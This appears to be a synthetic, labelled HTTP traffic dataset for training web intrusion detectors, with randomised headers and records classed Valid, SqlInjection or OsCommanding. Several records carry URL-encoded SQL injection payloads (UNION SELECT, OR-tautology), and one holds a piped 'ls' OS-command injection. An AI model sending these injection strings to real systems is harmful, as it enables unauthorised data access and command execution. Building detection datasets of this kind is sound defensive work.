Accept-Charset: iso-8859-8-i, iso-8859-9;q=0.0, iso-2022-jp
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 186.247.21.29
Cookie: 9oe4ugaaTiomr=09031824;hdlatwroo=rdRwetoee;cldxdi31nfn8Ia=33
Cookie2: $Version="74"
Date: Tue, 14 Jun 05 07:42:07 GMT
ETag: W/"Nz82-qo_pRYuuHt"
Expect: 100-continue
From: picsvpm@izhyigm.biz
If-Modified-Since: Thu, 01 Dec 05 09:25:17 CET
If-Unmodified-Since: Thu, 18 Sep 08 15:10:26 GMT
If-Match: "nV4C4hNh1N4Yqysd1"
If-None-Match: "Oc_f8UL.KWVNAjzaq3fJ"
If-Range: "4_U7q.H-oLwA4Ee1"
Max-Forwards: 51
MIME-Version: 6.7
Pragma: 6panH4t=ghhdM
Proxy-Authorization: Basic cjdHaGVsOm9zZW5tbklv
Authorization: Basic dGVoZHk6YWVyNmRl
Range: -49,43337-328,4-
Referer: http://sqcO.gov/9tee/ddevsey7/ehth91i.gif
TE: trailers,trailers
Trailer: TE
User-Agent: Sa9a9ss
UA-CPU: MIPS
UA-Disp: 7394,680,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 501x762
Via: 4.0 163.99.186.196:62, HTTP/8.3 www.eoIaoi.gif, 3.2 www.5hEtnt.htm
Transfer-Encoding: ikwsa; 3etI=oneyo
Upgrade: vskk/2.3, tfnsla/7.3, loe/7.8, iIaAoa/9.2
Warning: 090 0.229.140.58 "dvoi2e" 
X-Forwarded-For: 182.133.25.200
X-Serial-Number: 39169260132979
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12976
Start - Id: 27643
class: Valid
GET /inmd4/mKElI5F/hHnC-wuVdL69hr/pijaehqrl1sit/gctwu2usrGGinqhDI/ruelice/bui7wssmavaFdlEtaslu/z4lw@mgi1G9.htm?t8se1oftsoasore=dncrynihMirce&Es=d-hp%29&GUO@vQO=708&RbvonheTsqnlehr=t%22vsi+imgconnectn7ctcar+apS&w-F5s-=ecmcH3zztpx3&eueasM=system+8 HTTP/1.1
Host: www.uuaulI.cz
Connection: keep-alive
Accept: text/*;q=0.8
Accept-Charset: x-mac-turkish, windows-1257, iso-8859-1;q=0.7
Accept-Encoding: compress, gzip;q=0.1, identity;q=0.7
Accept-Language: s4l-em, aaTTt-scu, cra-lurl2;q=0.8
Cache-Control: no-transform
Client-ip: 249.193.66.99
Cookie: u8Lottox=Easccugmzoan2oesat;virC8o_php=2aic<tsenullbm5nwnr k ;tw4t=85IK38U;snNrco=0776;osy=R iho6Ilueb
Cookie2: $Version="8"
Date: Wed, 28 Nov 07 23:04:18 CET
ETag: W/"Q7FDirU-IyamM8-k"
Expect: 100-continue
From: Rofmod@oeornsCta.de
If-Modified-Since: Thu, 07 Aug 08 13:11:12 CET
If-Unmodified-Since: Sat, 01 Nov 08 07:24:18 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 42
MIME-Version: 0.1
Pragma: a='o3iE'
Proxy-Authorization: Basic TmVyRXQ6ejdUOQ==
Authorization: Basic Yk5ubXVydHI6b3Rvcg==
Range: -88
Referer: http://www.iLs6eNr.it/jnayat/0nia/tabjro/is5as/dtW6.php4
TE: chunked;q=0.8,chunked
Trailer: Via
User-Agent: Mozilla/4.7 (X11; U; SunOS sun4u 2.8; ia-n7; rv:4.4.2) Gecko/97611875
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0807x3166
Via: HTTP/2.8 www.t15yu.jpg:340, HTTP/1.8 139.227.215.56, 0.2 237.89.34.221
Transfer-Encoding: cnedw
Upgrade: n5eeiS/7.2
Warning: 259 www.rfDsn.jpg "ohSzyAnhwspipbdtmo" "Tue, 28 Jun 05 14:35:35 GMT"
X-Forwarded-For: 21.17.8.118
X-Serial-Number: 189697977036477
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27643
Start - Id: 35306
class: SqlInjection
GET /pTzo12ceR4p/SwsGr2ydaTr/r1rsOarHe/oeendnigdttotNei1/tUB0zWc@GusB-fjK/tHs/sfwhoxR5ZSdS@X@o1cbz/nhtaccesD-IXetcF8lBKGz/admindxZ/varNwhereV/eoiFjz6Fg_HImATslHF@.htm?on=kmR55F6Me1c&O5tssdyah=ietaN&htalt2asemc=4688&o6=a1ZiJtuWcm6e8Cere&eufrenCjSliiao=%5Cnnepsoz&qr@P=A1gdo%40telnet5null%3Cn%28%24ryt%3A&nic3hvavestoeag=331410&VkK.CH1x0.3n=i-&tteetYjoel=ohizwrI6ecft&51ca19oecN=vsnanOiktotbtGou&to2riyftre77=0&emiytU=%3B+++exec+get_cust%28+++%27x%27%27+++union+++select+object_name%2Cobject_type%2C%27%27x%27%27++++from+++user_objects++++where+++%27%27ctol%27%27+%3D+++%27%27+++%27++%29%3B HTTP/1.1
Host: www.5t2i.gov
Connection: ae6goi
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=9436
Client-ip: 213.3.132.26
Cookie: nvqstnTol=eaktxeitxy;5ihtaccesDdZDRwE=tth+f eqMunionpeeoa$Hn e;nFebvets=6DA_bKn
Cookie2: $Version="1"
Date: Mon, 08 Aug 05 19:12:40 UTC
ETag: "XhnahbLsp63w2wtblrc"
Expect: 100-continue
From: Nlnin@tbpee7c5t.it
If-Modified-Since: Sat, 22 Nov 08 09:16:55 GMT
If-Unmodified-Since: Thu, 30 Oct 08 09:01:15 UTC
If-Match: *
If-None-Match: "9QGKGFhefq4XN9Z4"
If-Range: Sun, 24 Jul 05 08:26:59 UTC
Max-Forwards: 47
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic bGVhY29vZjp0Z2xucmlv
Authorization: Digest nonce
Range: 92274-1,046-,79371-2
Referer: /oqgO/fned9oo/duUnmnE/yyciehh.fgf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: pdRbdeifsa (eO9S@C; fhCQ0O8; oL.6qtG)
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: 7.2 29.140.115.46, HTTP/6.8 www.shhseom5.jpeg, 7.4 www.tr5alitb.htm:3747
Transfer-Encoding: compress
Upgrade: dzlnt/9.5, oo3l/2.4
Warning: 727 226.166.210.3 "etaemlotia" "Mon, 31 Jan 05 16:57:11 UTC"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 75933173899999851
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35306
Start - Id: 43351
class: OsCommanding
GET /sa85eaeayeta44ajvotH/thu/isincnniSmaercdA.html?MeoneDgoee=%7CTh6smdh&X7-mlrcpaIeZ=lastoeirhsu4oWt&olNetoEA=ls++++-las+++%2Fhome%2F+++++%7C HTTP/1.1
Host: www.mZd1rdk.it:80
Connection: keep-alive
Accept: application/postscript
Accept-Charset: iso-8859-8-i
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=79
Client-ip: 39.142.10.38
Cookie: 0ain= i7q8;pofnewtohie=inracn6yrot;98AformR=SaosAtcieuUeeoh3
Cookie2: $Version="9"
Date: Sun, 11 Jan 09 04:33:37 CET
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Tue, 09 Jun 09 09:02:02 UTC
If-Unmodified-Since: Sun, 17 Oct 04 11:58:56 GMT
If-Match: *
If-None-Match: "5Xm4-j6QM8jjuTm-lF"
If-Range: *
Max-Forwards: 74
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="faby1"
Authorization: ilfe8 aoOeoE=oetOtoI
Range: -3
Referer: http://1faoro.gov/nm7Mtfw/ehftTvt.pl
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.2 (compatible; Konqueror/4.0; Open BSD i386; ieultals5; daet8l; eejireW)
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 331x628
Via: thyso/9.2 184.230.239.38, 2.2 50.121.243.139
Transfer-Encoding: identity
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 476 114.93.136.20 "eSSt" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43351
Start - Id: 6546
class: Valid
PUT /ptwdySts3plfxauost/2Ezku6MB9.jpg? HTTP/1.1
Content-Length: 117
Content-Language: sn91cN,tasiI
Content-Encoding: gzip
Content-Location: /7emsw/enYecE/wejaoay.cgi
Content-MD5: d2Nyc3A1cGVkYnlvdGllbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Sep 07 15:00:24 CET
Last-Modified: Mon, 19 Dec 05 18:13:18 CET
Host: 33.111.199.10:15037
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-hebrew;q=0.3, iso-8859-5, iso-2022-kr;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 214.204.53.200
Cookie: hani=es;eaectrinoaIas=59360
Cookie2: $Version="07"
Date: Sat, 01 Dec 07 20:16:19 UTC
ETag: W/"XRPzRSrkvILh2kJMf"
Expect: rtIode=sanniu
From: tejqkw@saIase.it
If-Modified-Since: Mon, 16 Feb 04 16:36:03 CET
If-Unmodified-Since: Sat, 30 Jul 05 23:07:53 CET
If-Match: "EtPljq9q@MMb5DPe0"
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZW5kTnBicml0Y2ZtcmUzczNnYXlpaWZzRU5mZHNybjQ4dXRXZXJodXJ5YzM=
Authorization: NTLM ZWN0RmloZXRMZXR0ZWVmbnMwc2VwdXJ0dG1pYWhlOHZzZ25BcmM=
Range: 3879-,44-395
Referer: /rnfarng/deenQsxm/anAj/tj3cra/eoontsR.php
TE: gzip;q=0.1
Trailer: Warning
User-Agent: clural/0.6.6.1
UA-CPU: Sparc
UA-Disp: 947,7624,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 578x446
Via: FTP/1.9 245.112.109.10, 1ue/0.8 5.62.62.190, FTP/0.3 8.199.2.211
Transfer-Encoding: nLnss
Upgrade: CltItd/4.4, eota/2.4, mra/4.2, e8S/6.9
Warning: 492 137.169.136.137 "uscqbomsNd" "Fri, 04 Apr 08 16:15:11 UTC"
X-Forwarded-For: 123.178.111.60
X-Serial-Number: 748074315126
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nsaavweuded=4GSK-aOgT&EqiEheta1=d&Odifscrat=67078987&skeao7h49=aoejh&sseipe0i=Hqhtpasstnode&CrtZOa=yltedaxcutCcqbsl4r

End - Id: 6546
Start - Id: 328
class: Valid
GET /1asrge/K93idloghu.png? HTTP/1.1
Host: www.6rTsSrnuo.fr
Connection: ltdont
Accept: */*
Accept-Charset: windows-874;q=0.7, x-mac-arabic;q=0.5, x-mac-roman
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.9
Cache-Control: eu='ys'
Client-ip: 169.4.168.60
Cookie: bawNsi=Xw;sdltsit5aLto=khizzo;twwseel=lTLTSr;hrunry=7
Cookie2: $Version="5"
Date: Mon, 18 Sep 06 18:31:15 CET
ETag: W/"iwoQ954Ux3XociSacO"
Expect: dayokar
From: sje5sdr@miS7tsh6.gov
If-Modified-Since: Fri, 31 Aug 07 14:15:05 GMT
If-Unmodified-Since: Sat, 11 Sep 04 03:30:52 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1874
MIME-Version: 0.8
Pragma: NRsc='t1doielu'
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Digest qop=so6qav6
Range: 2-05535,060939-
Referer: http://www.2iRetd.de/danai/aes2/3cih/bo0hlrRo.gif
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: pZ@K@LoI http://www.te2ap.uk
UA-CPU: PowerPC
UA-Disp: 6838,2277,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 170x4525
Via: HTTP/9.9 www.Nscezg.jpeg:56803, HTTP/7.3 66.243.85.1
Transfer-Encoding: deflate
Upgrade: raacIs/0.0, oshq/1.7, neDt/4.1, e9tg/9.3, ntro/9.0
Warning: 525 237.102.27.124 "s17tooevait4Le" 
X-Forwarded-For: 167.169.89.86
X-Serial-Number: 904392388533
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 328
Start - Id: 9023
class: Valid
GET /e8pDr/eteheesgboi/munisrK7ma/Cincludem.P7AUHPQ_-a.aspx?tmtbi=cltB0jhltnt&95.RRu=o&ndop6EpsorS=kaa%285&UuDs1m=eeiLocturh5mD7e&isd2Aed=0146543 HTTP/1.1
Host: www.ntyToenyWs.be:6
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: sw-stfnsg;q=0.7, traoSzn-yaatz, mbimeeah-c;q=0.8
Cache-Control: no-cache
Client-ip: 229.167.212.175
Cookie: 3gslYitioe=41395
Cookie2: $Version="71"
Date: Thu, 17 Jul 08 18:33:09 UTC
ETag: "FN6u6QdSK6AEAZLg"
Expect: rsna=taeheo4;iaiNrrni
From: otee@n4eh.ch
If-Modified-Since: Tue, 09 Feb 10 15:44:08 CET
If-Unmodified-Since: Wed, 29 Mar 06 07:41:57 GMT
If-Match: "IBjZGZQcuaZXxQPjr"
If-None-Match: "PAYcFawMEcPw-qEP"
If-Range: Thu, 25 Feb 10 23:06:34 UTC
Max-Forwards: 323
MIME-Version: 0.6
Pragma: rtkaEog='oNceHwo'
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: NTLM cmI1ZWV5eGxCbWlvaW0yTmlocmxmZ2JzZG1GdG5zdWVvYXNUVXRXODdh
Range: 64-0,4817-81
Referer: /oaRiz/aTGap/amfato/eRuA/9s1nheF.cgi
TE: trailers,deflate,trailers
Trailer: From
User-Agent: Mozilla/7.2 (Machintosh; U; PPC Mac OS X 6.0; 2t-um; rv:4.7.5) Gecko/20728755
UA-CPU: Sparc
UA-Disp: 7331,790,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7425x380
Via: HTTP/8.0 206.83.29.247, FTP/5.7 www.tsdp.js:055, 5.9 27.42.143.67
Transfer-Encoding: deflate
Upgrade: dwsena/9.6
Warning: 289 www.mbxzf4og.jpg "eAnhnsteieeelokc4" "Sun, 04 Jun 06 15:45:48 CET"
X-Forwarded-For: 111.61.129.208
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9023
Start - Id: 7719
class: Valid
PUT /aet3n7isuossi/rixhlHyishm/operlXOJn9kechopHpvxml8.pl? HTTP/1.1
Content-Length: 84
Content-Language: Rmjhm0,aeIio6r,oec7e
Content-Encoding: identity
Content-Location: /cslgcbra.mspx
Content-MD5: dUxic3Z0aWl4c29yNHR1aA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Jun 04 02:17:04 GMT
Last-Modified: Thu, 22 Apr 10 20:15:17 CET
Host: 10.157.11.9
Connection: WdsHd
Accept: */*
Accept-Charset: macintosh;q=0.1, windows-874;q=0.3, x-mac-greek;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.9
Cache-Control: max-age=4
Client-ip: 53.244.216.41
Cookie: haacmxa3ilnI698=oyperm;newsfOiAhnoyts3=pesofsEab16yhnn;I3DK_RNyk=94946;mr=fEytta
Cookie2: $Version="5"
Date: Wed, 28 Mar 07 07:39:06 GMT
ETag: "Lq7IiLf280N95wqM-yI"
Expect: lsoebqnj=eEeamdo;biEHtea=yneeSvNH
From: hmytnwrh@n44u6.net
If-Modified-Since: Wed, 11 Aug 04 06:34:09 CET
If-Unmodified-Since: Sat, 26 Aug 06 24:06:31 CET
If-Match: *
If-None-Match: "CsPlLT6uMbFrUeivp"
If-Range: *
Max-Forwards: 2981
MIME-Version: 7.7
Pragma: wn=djTeprae
Proxy-Authorization: NTLM cnltaHNmN2tjcHJ0YXNyZm9JdEllN3JwdGVlMGRldW5kU3JhWnk=
Authorization: Basic VG1pbjpOdDRvZXc4
Range: 408895-516542
Referer: http://www.bgrth.fr/vemuttfs/vvd0ot/dep5.asp
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: o@czd32 http://www.by6ifst.it
UA-CPU: Sparc
UA-Disp: 679,410,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 093x4978
Via: 7.5 www.3r9bnon.htm
Transfer-Encoding: gzip
Upgrade: rgaM/6.2, eac/6.8, aZco/9.9, tRa/2.6, hle/2.5
Warning: 480 196.122.77.17 "8mahoZAa56riutaIm" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 575043034
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cueo=e&HLVxBHVV=7AkveN8nNF2&ei=59&qhemeatnEH=uhhae&ulils6=tj6&r3nNeha7=t&solIdo6=lmt

End - Id: 7719
Start - Id: 17598
class: Valid
GET /7t2thaps/a7.php4?HfjnodeKsBi@=ynn&GCMr6=2935096&KM4H4M-5location=prab2eaum6genhE&frrhatlna9P=rItsIdltLhat&RdJkT=572867651&lfRRa=tc%5Doomtr&m9yittTnnd=ttd971ts&ridm6d=4167&thrdfe=4i%3A HTTP/1.1
Host: 217.112.253.10
Connection: close
Accept: application/x-tar, image/*;q=0.6, video/quicktime;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.7, cp-936, us-ascii;q=0.7
Accept-Encoding: identity;q=0.5, gzip, gzip;q=0.0, gzip, compress
Accept-Language: ivm-gNcruTi, Epeedptv-lufho, nabtela-rsAfuma, n-moet
Cache-Control: only-if-cached
Client-ip: 241.118.249.236
Cookie: traabist4e=mM9nEaqA;UamMfNJl=509;te7m=neAereux3&fea2t;cvSD9pautoexecHRtd=83057530
Cookie2: $Version="35"
Date: Mon, 19 Oct 09 02:06:31 UTC
ETag: "Q7Vw7fuluBJJcwQE42Qj"
Expect: znfroae
From: x3Anoo0o@wRaou4.biz
If-Modified-Since: Mon, 07 Jun 04 07:51:54 GMT
If-Unmodified-Since: Fri, 15 Oct 04 24:14:41 CET
If-Match: "86YreJXyLdlYc-q.aK"
If-None-Match: "nD77PRyTKfs6yJ74FYoH"
If-Range: Mon, 22 Mar 10 24:31:56 UTC
Max-Forwards: 7841
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM aWltYWZ2cmlpcmljZm1haTJuNjF0OW5zb2VlaWVlbmFkdnNvSG5uRGls
Authorization: shdae saAeoht=lripitia
Range: 65473-
Referer: http://6aha.it/ihtrDwM/facsu5an/teyeehn/syi4nfwp.swf
TE: trailers,gzip,trailers
Trailer: Authorization
User-Agent: knrtv9ed/7.7.9.7.1
UA-CPU: 68000
UA-Disp: 611,8955,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 519x8664
Via: 9.7 196.46.153.151, HTTP/4.4 20.171.84.86, 9.2 219.197.54.197
Transfer-Encoding: gzip
Upgrade: shme/8.6
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 200.24.82.209
X-Serial-Number: 607664307
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17598
Start - Id: 35364
class: SqlInjection
GET /rQq_RD5OwLHMbP7WaZIK/FRi-swcX5@7/ld5E@/eetCazrea/saf1_zp1t2go/uEeo2e49h/fIaVGGTeCf34w/-0/abscgdvtryfwttna/naATFr2eNUnodes/r86see/WpTmeD9.css?hrimifotilAt=2508253&2o=uOyt5&3to3eNr=7785322&eu6oso=tZafjruU&sR6iQ5Knode=trnnws%3Df%5Dt%2Fh5trm&ahioR=%27++++%29++UNION+++++ALL+++SELECT++z9Ltt++++%2C++dai+%2C+zeoort+++++FROM+++boRbdt++++WHERE+++++t4os+++NOT+++IN+++++%28%274CUvnll%27++%29+AND+++duzeiofa++NOT+IN+%28%27iottD1dxn%27++++%29++AND+++++%27%27++++%3D+%27&yrttu=e8pwCCrAf&bnferhabfnw=stafhexTiicnsun&lHetcL.hpf=iaos HTTP/1.0
Host: 157.106.83.78
Connection: umrcraw
Accept: image/jpeg
Accept-Charset: windows-1252, x-mac-cyrillic;q=0.0
Accept-Encoding: *
Accept-Language: ep-eo5onDn3;q=0.9, a-Obshcmln;q=0.0, cstd-sn;q=0.2, r-5tn2uts;q=0.2
Cookie2: $Version="3"
Date: Thu, 20 Apr 06 19:35:51 UTC
If-Range: *
Max-Forwards: 0
Referer: /je6e/Weaagd/eekmsetu/ln1ie7.aspx
Trailer: Pragma
User-Agent: ttNto/6.7

null

End - Id: 35364
Start - Id: 42534
class: SqlInjection
GET /bkjSkixm7trS/iBkwpbGiLli9/djoveastseNamzn3/atLo5esaescHn.php4?B4=jece8t&yKLD=OR++01%3E7910905301 HTTP/1.0
Host: 0.86.45.162
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese, windows-1250;q=0.9, iso-8859-3;q=0.0
Accept-Encoding: deflate, compress, gzip, identity, identity;q=0.7
Accept-Language: *
Cache-Control: max-age=36
Client-ip: 10.107.43.154
Cookie: 9eOasnacwewadao=rkebAdnrpa8ls;Ry1d2stfe=sheowmdeohopmrr7ai;sX@DDH6=x5;P4p=77;luoeeyuio=828613988
Cookie2: $Version="051"
Date: Thu, 15 Mar 07 06:45:13 GMT
ETag: "YaiKF0rmASDK-26T"
Expect: 100-continue
From: bs1as@pton6i0pc.org
If-Modified-Since: Mon, 16 Jan 06 11:56:32 UTC
If-Unmodified-Since: Thu, 20 Apr 06 09:26:30 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 480
MIME-Version: 1.7
Pragma: drde='7e'
Proxy-Authorization: Digest nc=ABB8e3d4
Authorization: tgtCnw drelj=mmrlnd
Range: 79786-446
Referer: /haalf1S/NeEuy.js
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: ew96qKP5@ http://www.tdon.com
UA-CPU: x86
UA-Disp: 1092,0849,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 7.3 125.59.143.86, cotrl/2.5 www.htimiaar.tiff, FTP/6.2 22.2.180.118
Transfer-Encoding: deflate
Upgrade: e2torm/4.8, rnb/5.6, cpieM/3.1, alfi/8.5
Warning: 080 122.26.58.92 "S5IseRilndhbniaya" "Sat, 05 May 07 24:34:31 UTC"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42534
Start - Id: 34247
class: Valid
POST /xechoSr@gTyjU00/@xxrml3dsystemIUWxZ/8wyO.Sy/_AQwJ4AmQM2/u.4o5OI.sh? HTTP/1.0
Content-Length: 110
Content-Language: egiid7n,Ts
Content-Encoding: deflate
Content-Location: http://www.0uet.gov/emzbhKv/ZySte.css
Content-MD5: ZWVkbnNueWhpU3RsZW5vWA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Jun 08 24:27:51 CET
Last-Modified: Tue, 30 Mar 10 18:24:36 CET
Host: www.7l2eyr.fr
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: cot-rb;q=0.4, eeol0ee-teo, ArtQ-8n;q=0.5, oltfut-oknker
Cache-Control: max-stale=22
Client-ip: 207.220.68.217
Cookie: iilHbsesJh=nerN4uOS;rur=p5Ttislot=;dteo12=+y+htacces
Cookie2: $Version="82"
Date: Thu, 22 Nov 07 17:54:36 CET
ETag: "mC64MIBbw8y2lU14C"
Expect: 100-continue
From: uoRceh@bnhno.gov
If-Modified-Since: Sat, 04 Oct 08 20:01:37 GMT
If-Unmodified-Since: Thu, 14 Aug 08 10:47:37 CET
If-Match: *
If-None-Match: "9wZwDxFPjb--nR8ko"
If-Range: *
Max-Forwards: 8041
MIME-Version: 7.6
Pragma: oaeXaD='1e0G6'
Proxy-Authorization: 7hiun ohh8hes=lTNz
Authorization: NTLM aHVzbzJjZWVpcjdlZmowSHJ3aXJUbnJ0YWVzZWV0NkVlbGRhNm90YjA=
Range: -804943,968106-
Referer: http://hsnn.st/tslyhsm.css
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/9.0 (X11; U; Unix 5.1; aa-dE; rv:1.4.3) Gecko/64780039
UA-CPU: 68000
UA-Disp: 6221,5236,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5781x4344
Via: HTTP/7.8 36.148.9.191, 5.2 245.244.128.175
Transfer-Encoding: atpe; twTymlA=jemilrs
Upgrade: ezhTe/9.1, i0t/1.3, huh/6.9, rDvATi/7.5
Warning: 954 www.nnennttt.js "hztaw" "Sat, 16 Oct 04 21:52:44 UTC"
X-Forwarded-For: 70.193.7.214
X-Serial-Number: 66994
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

o5ahihmciiBsdkz=a&cesyeeerIucarVy=848162&oc3ad=ous/gssana7ioHn&hdionnrth=PwlaffC@Hij:lb&gu=difleotn4riTO

End - Id: 34247
Start - Id: 829
class: Valid
GET /euso3nnp/6ZoaEDOPK0l8.kt/dS3uax@YM8B2Nqix93uX/sb8lQQNRWTra-F/i22qb/yxJ7o2B-.lST3WYML9./eZfvXP_C7pSO76/8gcmx/taars9tiwd.dll?tuwgu=016&llILP32n=alwse5goetsau5e&xwetotocsoom=9570319&9le=Zni&6dmie3eno=21622 HTTP/1.0
Host: 50.174.215.143:24043
Connection: crvAci8n
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: rUs-olMaesot
Cache-Control: only-if-cached
Client-ip: 201.221.172.239
Cookie: zhaqdteFeenh24= exiweab;dvhmcndeftc=24326571;e0ZOrcyjcIhen=v5Qt4siturbt;liroebGvre=6839194
Cookie2: $Version="5"
Date: Sat, 29 Jan 05 10:46:15 UTC
ETag: W/"8psnNa7PslCww8j"
Expect: 100-continue
From: beehXn@hvnehe88hn.net
If-Modified-Since: Fri, 02 Feb 07 01:22:48 CET
If-Unmodified-Since: Sat, 19 May 07 18:58:04 UTC
If-Match: "_hUJBvIDdWBVzxBZde-"
If-None-Match: *
If-Range: "8KNLfdUr5b_F.G27.M"
Max-Forwards: 0922
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM czY0bW9zY3NlZ29wbXB0enRkZVJnYnNYbUtpMGlzbnZu
Authorization: NTLM cmdnNG50VGVhdGl1ZW16ZG95QWZlb0VuRE9QbmU2b24=
Range: -5014,811909-578591
Referer: /iooie/oynnx/bnhyanh.mdb
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: jKntroixaasuei
UA-CPU: Sparc
UA-Disp: 801,214,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 079x771
Via: HTTP/0.1 www.Sitel.png, 8.0 www.geee.gif:581, 4.0 237.31.96.217
Transfer-Encoding: compress
Upgrade: almoet/4.8, agnifh/3.7, kiSch/4.1
Warning: 143 157.105.202.150 "sEsibsATArcahcgbo" "Fri, 23 Jun 06 19:18:43 UTC"
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 510626783025324042
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 829
Start - Id: 6885
class: Valid
PUT /ojBzilwZZp6dbWhQX5/no/t2fDLP/iM5D_9B3hn@w/y4GZinrBLghF/5WWH@IGzrH.htm? HTTP/1.1
Content-Length: 87
Content-Language: t0ai,87,lnjlh8h
Content-Encoding: deflate
Content-Location: /no9eRt/oraCsSs/ng1ant/wmerdm.asp
Content-MD5: bm5zaXRiaWF6YXNhZXN0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Apr 06 07:54:03 GMT
Last-Modified: Mon, 04 Sep 06 15:59:06 CET
Host: 42.134.163.49
Connection: close
Accept: application/*
Accept-Charset: x-mac-greek, windows-1255, big5
Accept-Encoding: 
Accept-Language: b-o;q=0.5, 9G5-dmeatgcs, teeeaI-qyin4, refngtl-ra;q=0.1
Cache-Control: no-store
Client-ip: 33.219.110.83
Cookie: 6eshdtEqspf5r=rim@ND4yRG;jLRrmQES3Q7=NlDnisanaeper;atonfeehvennd=LenRlSotlnGter5shf;Ti15e8c4lneoioa=05;nLdamsTi2=8
Cookie2: $Version="18"
Date: Sun, 18 Jun 06 10:33:16 CET
ETag: W/"Y6N0NUinwp3pNl1Hx"
Expect: onEoapn4=rlrg5;xate=bhaeer
From: 1m1ll@ibidpns.org
If-Modified-Since: Wed, 01 Dec 04 23:01:59 GMT
If-Unmodified-Since: Tue, 13 Jun 06 21:53:55 UTC
If-Match: "ieHEifasI.FO80r4Py"
If-None-Match: *
If-Range: Sun, 15 Oct 06 07:35:51 UTC
Max-Forwards: 549
MIME-Version: 1.0
Pragma: xMn=eiaE
Proxy-Authorization: Digest uri=http://nsa5.net/jIlhTi.rar
Authorization: Digest nonce
Range: -93,35-
Referer: /Rsa6xnn/mE5z.dll
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: u1ugenJt (tPBoDYL.)
UA-CPU: x86
UA-Disp: 2306,5662,32
